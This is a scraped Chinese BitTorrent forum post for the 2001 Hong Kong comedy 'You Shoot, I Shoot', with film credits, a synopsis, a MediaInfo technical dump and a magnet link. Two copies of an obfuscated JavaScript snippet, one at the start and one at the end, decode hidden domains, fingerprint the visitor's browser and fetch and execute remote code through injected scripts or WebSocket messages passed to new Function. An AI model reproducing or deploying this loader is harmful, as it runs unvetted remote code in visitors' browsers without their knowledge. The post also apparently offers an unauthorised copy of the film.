买凶拍人[国粤语音轨/简繁字幕].You.Shoot.I.Shoot.2001.BluRay.1080p.2Audio.DTS-HD.MA.5.1.x265.10bit 10.90GB

版主小s 1月前 311

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 买凶拍人 / You Shoot, I Shoot

◎片 名 買兇拍人

◎年 代 2001

◎产 地 中国香港

◎类 别 喜剧 / 动作 / 犯罪

◎语 言 粤语 / 法语 / 日语

◎上映日期 2001-08-16(中国香港)

◎IMDb链接 https://www.imdb.com/title/tt0312932/

◎豆瓣评分 8.2/10 (129780人评价)

◎豆瓣链接 https://movie.douban.com/subject/1300616/

◎片 长 99分钟

◎导 演 彭浩翔 Ho-Cheung Pang (id:1000148)

◎编 剧 彭浩翔 Ho-Cheung Pang (id:1000148)

谷德昭 Vincent Kok (id:1025526)

◎演 员 葛民辉 Eric Kot (id:1017040)

张达明 Tat-Ming Cheung (id:1274433)

詹瑞文 Sui-man Chim (id:1304196)

樋口明日嘉 Asuka Higuchi (id:1051169)

陈惠敏 Wai-Man Chan (id:1012699)

方子璇 Audrey Fong (id:1317575)

陈辉虹 Fai-hung Chan (id:1316612)

缪非临 Fei-Lam Miu (id:1317576)

刘以达 Tats Lau (id:1034328)

林雪 Suet Lam (id:1274279)

邵音音 Yin-Yin Shaw (id:1297367)

王合喜 Ken Wong (id:1008281)

彭浩翔 Ho-Cheung Pang (id:1000148)

彭秀慧 Kearen Pang (id:1318293)

汤盈盈 Angela Tong (id:1150279)

毕国智 Kenneth Bi (id:1278580)

周兆麟 Siu Leun Chow (id:1379576)

范振锋 Ricky Fan (id:1377266)

于洋 Henry Yu (id:1323629)

潘雁英 An-Ying Poon (id:1423733)

茜利妹 Hyper BB (id:1411581)

方平 Henry Fong (id:1312822)

兰茜 Lan Sai (id:1315586)

林尚义 Spencer Lam (id:1042889)

郑祖 Joe Cheng (id:1318850)

张咏妍 Wing Cheung (id:1322608)

李道谕 Do-Yu Lee (id:1327704)

徐志雄 Terence Tsui (id:1331330)

王文駿 Man-Chun Wong (id:1441056)

邹文怀 Raymond Chow (id:1016883)

彭浩翔 Ho-Cheung Pang (id:1000148)

金培达 Peter Kam (id:1288082)

李栋全 Wenders Li (id:1275162)

雷楚雄 Bill Lui (id:1290436)

邹文怀 Raymond Chow (id:1016883)

◎标 签 彭浩翔 / 黑色幽默 / 香港 / 喜剧 / 香港电影 / 搞笑 / 葛民辉 / cult

◎简 介

职业杀手Bart(葛民辉饰)技艺高超,雇主很多,收入不俗。他与妻子阿玲(方子璇饰)居于高级住宅区,小日子过的非常滋润。可惜好景不长,金融风暴后夫妻二人陷入经济危机。Bart迫于无奈,便为有钱太太杀人服务,不想有钱太太要求苛刻,要Bart在杀人之余还得拍下杀人过程,方泄心头之恨。Bart深明顾客至上的道理,决定找一个拍档合作。凑巧Bart在酒吧见到导演阿全(张达明饰),二人一拍即合,成为了杀手导演二人组,一时间生意大增,一连串的“买凶拍人”行动随即展开。后来江湖大佬标哥听闻,决定聘Bart及阿全代劳,杀死社团叛徒大雄,并要拍下影带,好让他有真凭实据能向社团交代,稳坐执事人一职。这次买凶拍人行动能否成功呢?

◎获奖情况 (共1项)

第21届香港电影金像奖 (2002)

最佳编剧(提名)

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 233001643599895480480973190550645222951 (0xAF4A7BF7CFA7C8AC761F10C30C79AE27)

  4. Complete name : You.Shoot.[email protected]BBQDDQ.COM.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 10.9 GiB

  8. Duration : 1 h 38 min

  9. Overall bit rate mode : Variable

  10. Overall bit rate : 15.8 Mb/s

  11. Encoded date : UTC 2021-10-14 11:36:54

  12. Writing application : mkvmerge v49.0.0 ('Sick Of Losing Soulmates') 64-bit

  13. Writing library : libebml v1.4.0 + libmatroska v1.6.1


  14. Video

  15. ID : 1

  16. Format : HEVC

  17. Format/Info : High Efficiency Video Coding

  18. Format profile : Main [email protected]@High

  19. Codec ID : V_MPEGH/ISO/HEVC

  20. Duration : 1 h 38 min

  21. Bit rate : 12.0 Mb/s

  22. Width : 1 920 pixels

  23. Height : 1 080 pixels

  24. Display aspect ratio : 16:9

  25. Frame rate mode : Constant

  26. Frame rate : 24.000 FPS

  27. Color space : YUV

  28. Chroma subsampling : 4:2:0

  29. Bit depth : 10 bits

  30. Bits/(Pixel*Frame) : 0.241

  31. Stream size : 8.28 GiB (76%)

  32. Title : HEVC, [email protected]@High, 24 fps @ 11990 kbps

  33. Writing library : x265 3.4+14-gd419c7152:[Windows][GCC 10.2.0][64 bit] 10bit

  34. Encoding settings : cpuid=533541111039 / frame-threads=3 / numa-pools=8 / wpp / pmode / pme / no-psnr / no-ssim / log-level=2 / input-csp=1 / input-res=1920x1080 / interlace=0 / total-frames=142368 / level-idc=51 / high-tier=1 / uhd-bd=0 / ref=5 / no-allow-non-conformance / no-repeat-headers / annexb / no-aud / no-hrd / info / hash=0 / no-temporal-layers / open-gop / min-keyint=24 / keyint=240 / gop-lookahead=0 / bframes=6 / b-adapt=2 / b-pyramid / bframe-bias=0 / rc-lookahead=40 / lookahead-slices=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / no-splice / no-intra-refresh / ctu=32 / min-cu-size=8 / no-rect / no-amp / max-tu-size=32 / tu-inter-depth=3 / tu-intra-depth=3 / limit-tu=4 / rdoq-level=2 / dynamic-rd=0.00 / no-ssim-rd / signhide / no-tskip / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-merge=4 / limit-refs=1 / limit-modes / me=3 / subme=4 / merange=25 / temporal-mvp / no-frame-dup / no-hme / weightp / weightb / no-analyze-src-pics / deblock=-3:-3 / no-sao / no-sao-non-deblock / rd=6 / selective-sao=0 / no-early-skip / rskip / no-fast-intra / no-tskip-fast / no-cu-lossless / b-intra / no-splitrd-skip / rdpenalty=0 / psy-rd=2.00 / psy-rdoq=1.00 / no-rd-refine / no-lossless / cbqpoffs=0 / crqpoffs=0 / rc=crf / crf=19.5 / qcomp=0.65 / qpstep=4 / stats-write=0 / stats-read=0 / vbv-maxrate=80000 / vbv-bufsize=80000 / vbv-init=0.9 / crf-max=0.0 / crf-min=0.0 / ipratio=1.40 / pbratio=1.30 / aq-mode=2 / aq-strength=0.85 / cutree / zone-count=0 / no-strict-cbr / qg-size=32 / no-rc-grain / qpmax=69 / qpmin=0 / no-const-vbv / sar=1 / overscan=0 / videoformat=5 / range=0 / colorprim=1 / transfer=1 / colormatrix=1 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / no-scenecut-aware-qpconformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0

  35. Language : English

  36. Default : Yes

  37. Forced : No

  38. Color range : Limited

  39. Color primaries : BT.709

  40. Transfer characteristics : BT.709

  41. Matrix coefficients : BT.709


  42. Audio #1

  43. ID : 2

  44. Format : DTS XLL

  45. Format/Info : Digital Theater Systems

  46. Commercial name : DTS-HD Master Audio

  47. Codec ID : A_DTS

  48. Duration : 1 h 38 min

  49. Bit rate mode : Variable

  50. Bit rate : 2 260 kb/s

  51. Channel(s) : 6 channels

  52. Channel layout : C L R Ls Rs LFE

  53. Sampling rate : 48.0 kHz

  54. Frame rate : 93.750 FPS (512 SPF)

  55. Bit depth : 16 bits

  56. Compression mode : Lossless

  57. Stream size : 1.56 GiB (14%)

  58. Title : Cantonese DTS-HD Master Audio 5.1 @ 2260 kbps

  59. Language : Chinese

  60. Default : Yes

  61. Forced : No


  62. Audio #2

  63. ID : 3

  64. Format : AC-3

  65. Format/Info : Audio Coding 3

  66. Commercial name : Dolby Digital

  67. Codec ID : A_AC3

  68. Duration : 1 h 38 min

  69. Bit rate mode : Constant

  70. Bit rate : 640 kb/s

  71. Channel(s) : 6 channels

  72. Channel layout : L R C LFE Ls Rs

  73. Sampling rate : 48.0 kHz

  74. Frame rate : 31.250 FPS (1536 SPF)

  75. Compression mode : Lossy

  76. Stream size : 453 MiB (4%)

  77. Title : Mandarin Dolby Digital Audio 5.1 @ 640 kbps

  78. Language : Chinese

  79. Service kind : Complete Main

  80. Default : No

  81. Forced : No


  82. Audio #3

  83. ID : 4

  84. Format : AC-3

  85. Format/Info : Audio Coding 3

  86. Commercial name : Dolby Digital

  87. Codec ID : A_AC3

  88. Duration : 1 h 38 min

  89. Bit rate mode : Constant

  90. Bit rate : 192 kb/s

  91. Channel(s) : 2 channels

  92. Channel layout : L R

  93. Sampling rate : 48.0 kHz

  94. Frame rate : 31.250 FPS (1536 SPF)

  95. Compression mode : Lossy

  96. Stream size : 136 MiB (1%)

  97. Title : Cantonese Dolby Digital Audio 2.0 @ 192 kbps Commentary 1

  98. Language : Chinese

  99. Service kind : Complete Main

  100. Default : No

  101. Forced : No


  102. Audio #4

  103. ID : 5

  104. Format : AC-3

  105. Format/Info : Audio Coding 3

  106. Commercial name : Dolby Digital

  107. Codec ID : A_AC3

  108. Duration : 1 h 38 min

  109. Bit rate mode : Constant

  110. Bit rate : 192 kb/s

  111. Channel(s) : 2 channels

  112. Channel layout : L R

  113. Sampling rate : 48.0 kHz

  114. Frame rate : 31.250 FPS (1536 SPF)

  115. Compression mode : Lossy

  116. Stream size : 136 MiB (1%)

  117. Title : Cantonese Dolby Digital Audio 2.0 @ 192 kbps Commentary 2

  118. Language : Chinese

  119. Service kind : Complete Main

  120. Default : No

  121. Forced : No


  122. Text #1

  123. ID : 6

  124. Format : PGS

  125. Codec ID : S_HDMV/PGS

  126. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  127. Duration : 1 h 35 min

  128. Bit rate : 58.7 kb/s

  129. Count of elements : 3798

  130. Stream size : 40.3 MiB (0%)

  131. Title : Cht/SUP 原盘繁体

  132. Language : Chinese

  133. Default : No

  134. Forced : No


  135. Text #2

  136. ID : 7

  137. Format : PGS

  138. Codec ID : S_HDMV/PGS

  139. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  140. Duration : 1 h 35 min

  141. Bit rate : 52.6 kb/s

  142. Count of elements : 3798

  143. Stream size : 36.1 MiB (0%)

  144. Title : Chs/SUP 原盘简体

  145. Language : Chinese

  146. Default : Yes

  147. Forced : No


  148. Text #3

  149. ID : 8

  150. Format : PGS

  151. Codec ID : S_HDMV/PGS

  152. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  153. Duration : 1 h 35 min

  154. Bit rate : 53.7 kb/s

  155. Count of elements : 3798

  156. Stream size : 36.8 MiB (0%)

  157. Title : Eng/SUP

  158. Language : English

  159. Default : No

  160. Forced : No


  161. Text #4

  162. ID : 9

  163. Format : PGS

  164. Codec ID : S_HDMV/PGS

  165. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  166. Duration : 1 h 38 min

  167. Bit rate : 62.1 kb/s

  168. Count of elements : 3138

  169. Stream size : 43.6 MiB (0%)

  170. Title : Cht/SUP 原盘繁体 Commentary 1

  171. Language : Chinese

  172. Default : No

  173. Forced : No


  174. Text #5

  175. ID : 10

  176. Format : PGS

  177. Codec ID : S_HDMV/PGS

  178. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  179. Duration : 1 h 38 min

  180. Bit rate : 55.5 kb/s

  181. Count of elements : 3138

  182. Stream size : 39.0 MiB (0%)

  183. Title : Chs/SUP 原盘简体 Commentary 1

  184. Language : Chinese

  185. Default : No

  186. Forced : No


  187. Text #6

  188. ID : 11

  189. Format : PGS

  190. Codec ID : S_HDMV/PGS

  191. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  192. Duration : 1 h 38 min

  193. Bit rate : 57.9 kb/s

  194. Count of elements : 3138

  195. Stream size : 40.7 MiB (0%)

  196. Title : Eng/SUP Commentary 1

  197. Language : English

  198. Default : No

  199. Forced : No


  200. Text #7

  201. ID : 12

  202. Format : PGS

  203. Codec ID : S_HDMV/PGS

  204. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  205. Duration : 1 h 37 min

  206. Bit rate : 58.0 kb/s

  207. Count of elements : 3480

  208. Stream size : 40.5 MiB (0%)

  209. Title : Cht/SUP 原盘繁体 Commentary 2

  210. Language : Chinese

  211. Default : No

  212. Forced : No


  213. Text #8

  214. ID : 13

  215. Format : PGS

  216. Codec ID : S_HDMV/PGS

  217. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  218. Duration : 1 h 37 min

  219. Bit rate : 51.9 kb/s

  220. Count of elements : 3480

  221. Stream size : 36.2 MiB (0%)

  222. Title : Chs/SUP 原盘简体 Commentary 2

  223. Language : Chinese

  224. Default : No

  225. Forced : No


  226. Text #9

  227. ID : 14

  228. Format : PGS

  229. Codec ID : S_HDMV/PGS

  230. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  231. Duration : 1 h 37 min

  232. Bit rate : 56.6 kb/s

  233. Count of elements : 3480

  234. Stream size : 39.5 MiB (0%)

  235. Title : Eng/SUP Commentary 2

  236. Language : English

  237. Default : No

  238. Forced : No


  239. Menu

  240. 00:00:00.000 : en:第 01 章

  241. 00:09:01.375 : en:第 02 章

  242. 00:14:37.208 : en:第 03 章

  243. 00:18:29.708 : en:第 04 章

  244. 00:21:46.458 : en:第 05 章

  245. 00:26:46.583 : en:第 06 章

  246. 00:35:53.083 : en:第 07 章

  247. 00:40:57.542 : en:第 08 章

  248. 00:45:56.167 : en:第 09 章

  249. 00:51:32.792 : en:第 10 章

  250. 00:53:11.542 : en:第 11 章

  251. 00:59:55.792 : en:第 12 章

  252. 01:07:39.167 : en:第 13 章

  253. 01:11:57.125 : en:第 14 章

  254. 01:17:07.000 : en:第 15 章

  255. 01:23:02.833 : en:第 16 章

  256. 01:26:28.167 : en:第 17 章

  257. 01:30:07.083 : en:第 18 章




复制代码


TAGS 动作 犯罪 喜剧

磁力链:
  • magnet:?xt=urn:btih:A7BC829026441645DDB4DB9A3B708EBC3FCDD6E8

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};